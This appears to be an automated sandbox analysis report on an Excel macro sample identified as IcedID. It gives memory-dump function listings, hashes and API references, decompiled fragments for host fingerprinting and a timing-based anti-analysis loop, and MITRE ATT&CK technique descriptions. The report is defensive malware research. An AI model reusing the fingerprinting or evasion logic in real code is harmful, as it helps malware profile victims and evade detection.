Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
Instruction Fuzzy Hash: CA21CF3A341B409AEB10EFB1E9643ED23A2F758788F584426DE0D57648EF38D609C750

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000007FEF8FB13FA

Strings

7, xrefs: 000007FEF8FB14E1
G, xrefs: 000007FEF8FB1458
2, xrefs: 000007FEF8FB14F9
G, xrefs: 000007FEF8FB15AF
G, xrefs: 000007FEF8FB1426
G, xrefs: 000007FEF8FB137C
G, xrefs: 000007FEF8FB1448
EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl, xrefs: 000007FEF8FB13FD
G, xrefs: 000007FEF8FB141B
G, xrefs: 000007FEF8FB1431

Memory Dump Source

Source File: 00000004.00000002.2090863987.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2090859936.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090868469.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090873648.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090877567.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
API String ID: 4275171209-1517691801
Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 000007FEF8FB11EC
GetThreadPriority.KERNEL32 ref: 000007FEF8FB11FA
GetCurrentThread.KERNEL32 ref: 000007FEF8FB1204
CreateThread.KERNEL32 ref: 000007FEF8FB123C
WaitForSingleObject.KERNEL32 ref: 000007FEF8FB124F
DuplicateHandle.KERNEL32 ref: 000007FEF8FB128D

Strings

_, xrefs: 000007FEF8FB1293
DllRegisterServer, xrefs: 000007FEF8FB12F6
G, xrefs: 000007FEF8FB12DF

Memory Dump Source

Source File: 00000004.00000002.2090863987.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2090859936.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090868469.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090873648.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090877567.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
String ID: DllRegisterServer$G$_
API String ID: 1174013218-1650116920
Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000007FEF8FB220B

Strings

@, xrefs: 000007FEF8FB21E1

Memory Dump Source

Source File: 00000004.00000002.2090863987.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2090859936.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090868469.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090873648.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090877567.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: @
API String ID: 4275171209-2766056989
Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01

Uniqueness

Uniqueness Score: -1.00%

Function 021A10AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 021A10B7
RtlExitUserProcess.NTDLL ref: 021A10C8

Memory Dump Source

Source File: 00000004.00000002.2089465073.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: true

Similarity

API ID: ExitProcessSleepUser
String ID:
API String ID: 354099737-0
Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
Instruction ID: 94c6f1aac56dc03f0d1fd537badbbfe98a6b3231ba6b7e9a09541be34ac21ccb
Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
Instruction Fuzzy Hash: 8AC08C3450A680E2F31E9B20EB6F3E83239B320309F010619C20B096E08F7C00C8C303

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000007FEF8FB327B

Memory Dump Source

Source File: 00000004.00000002.2090863987.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2090859936.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090868469.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090873648.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090877567.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40

Uniqueness

Uniqueness Score: -1.00%

Function 021A2C08, Relevance: 1.6, APIs: 1, Instructions: 65
memoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E021A2C08(void* __ecx, void* __edx, void* __edi, intOrPtr* __rax, long long __rbx, long long __rsi, long long __rbp, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _t22;
				int _t23;
				int _t24;
				void* _t30;
				void* _t36;
				intOrPtr* _t40;
				long long _t46;
				signed long long _t47;
				signed long long _t48;
				intOrPtr* _t68;
				long long _t70;

				_t40 = __rax;
				_t36 = __edi;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t70 = __r8;
				GetProcessHeap();
				r8d = 0x2001;
				_t22 = RtlAllocateHeap(??, ??, ??); // executed
				_t68 = __rax;
				_t38 = __rax;
				if(__rax != 0) {
					r9d = __ecx;
					_t23 = wsprintfW(??, ??);
					r9d = __edx;
					_t24 = wsprintfW(??, ??);
					r9d = E021A2BD8(_t24, __rax, L"%s%u");
					_t46 = _t23 + _t24 + wsprintfW(??, ??);
					r9d = E021A1678(__rax, _t46, __r8);
					_t47 = _t46 + wsprintfW(??, ??);
					E021A1D18(__rax, _t47, __rax + _t47 * 2, _t70);
					_t48 = _t47 + __rax;
					_t30 = E021A1AC8(_t38, __rax, _t48, __rax + _t48 * 2, ":");
					_t49 = _t48 + __rax;
					E021A2A98(_t30, _t36, __rax, _t48 + __rax, __rax + (_t48 + __rax) * 2, _t70, _t70);
					_t22 = E021A27BC(_t49 + _t40, _t68 + (_t49 + _t40) * 2, _t70, ":");
				}
				return _t22;
			}

0x021a2c08
0x021a2c08
0x021a2c08
0x021a2c0d
0x021a2c12
0x021a2c1c
0x021a2c23
0x021a2c2e
0x021a2c37
0x021a2c3d
0x021a2c40
0x021a2c43
0x021a2c49
0x021a2c5d
0x021a2c66
0x021a2c7e
0x021a2c93
0x021a2ca9
0x021a2cb5
0x021a2ccb
0x021a2cd2
0x021a2cd7
0x021a2cde
0x021a2ce3
0x021a2ced
0x021a2cf9
0x021a2cfe
0x021a2d15

APIs

RtlAllocateHeap.NTDLL(?,?,00000003,021A24A4), ref: 021A2C37

Part of subcall function 021A1678: NtQuerySystemInformation.NTDLL(?,?,00000000,021A2CB1,?,?,00000003,021A24A4), ref: 021A16CB

Part of subcall function 021A27BC: GetAdaptersInfo.IPHLPAPI(?,?,00000000,021A2CFE,?,?,00000003,021A24A4), ref: 021A280F
Part of subcall function 021A27BC: GetAdaptersInfo.IPHLPAPI(?,?,00000000,021A2CFE,?,?,00000003,021A24A4), ref: 021A2845

Memory Dump Source

Source File: 00000004.00000002.2089465073.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: true

Similarity

API ID: AdaptersInfo$AllocateHeapInformationQuerySystem
String ID:
API String ID: 1716770124-0
Opcode ID: 551f92eabf4abe2fe4f6e692089831cc0b5c0ff75ee8c8a7613f42fc3d82b9ba
Instruction ID: 6004562a5bf36229fe6bdb9ca4f03f583ebff769714c94dc16b06d4bd596c1b0
Opcode Fuzzy Hash: 551f92eabf4abe2fe4f6e692089831cc0b5c0ff75ee8c8a7613f42fc3d82b9ba
Instruction Fuzzy Hash: 3A214C75782B00A6DB109B51F9593ED6360FB65B81F94402ACE0E87774EF78C659C300

Uniqueness

Uniqueness Score: -1.00%

Function 021A260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,021A1E13), ref: 021A264B

Memory Dump Source

Source File: 00000004.00000002.2089465073.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: true

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
Instruction ID: afb9a8436417705bf38d79d313db8c2a430267b4ade641ebe74695f219461683
Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
Instruction Fuzzy Hash: 62E09236722541C2DF10EB20EA593DDB321FBA4704F840122895E026A0EF6CC75EC741

Uniqueness

Uniqueness Score: -1.00%

Function 021A1000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 021A1022

Memory Dump Source

Source File: 00000004.00000002.2089465073.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: true

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
Instruction ID: bbffd4d102259d04a891eaf98f853e395b257a2e54d6722b6f37731563aa9d5b
Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
Instruction Fuzzy Hash: A3D0A976E1028083F7308B20EB2B3DA3321F3A4319F808206CA4E44964DF7CC158CA01

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON

Download Yara Rule

Strings

%, xrefs: 000007FEF8FB17B2

Memory Dump Source

Source File: 00000004.00000002.2090863987.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2090859936.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090868469.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090873648.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090877567.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2090863987.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true

Associated: 00000004.00000002.2090859936.000007FEF8FB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090868469.000007FEF8FB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090873648.000007FEF8FBE000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2090877567.000007FEF8FC0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50

Uniqueness

Uniqueness Score: -1.00%

Function 021A1E50, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E021A1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}

0x021a1e50
0x021a1e50
0x021a1e50
0x021a1e50
0x021a1e55
0x021a1e5a
0x021a1e5f
0x021a1e60
0x021a1e6b
0x021a1e6b
0x021a1e71
0x021a1e73
0x021a1e84
0x021a1e86
0x021a1e8a
0x021a1e8e
0x021a1e92
0x021a1e96
0x021a1e98
0x021a1e9f
0x021a1ea2
0x021a1ea5
0x021a1eab
0x021a1ead
0x021a1eb8
0x021a1eba
0x021a1ec1
0x021a1ec4
0x021a1ec7
0x021a1ec7
0x021a1ee9

Memory Dump Source

Source File: 00000004.00000002.2089465073.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
Instruction ID: 8de855037ad91f38a81944351615b4319b93f0f710ec073fc3c2c5998fd1b45f
Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
Instruction Fuzzy Hash: 9101B172B24B908BDF248F36B60538AB6A2F38D7C0F148535EB9C43B18DA3CD0958B04

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report List-4527768.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: IcedID

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Function 021A27BC, Relevance: 3.1, APIs: 2, Instructions: 87
COMMON

Function 021A2434, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Function 021A2C08, Relevance: 1.6, APIs: 1, Instructions: 65
memoryCOMMON

Function 021A1E50, Relevance: .0, Instructions: 47
COMMON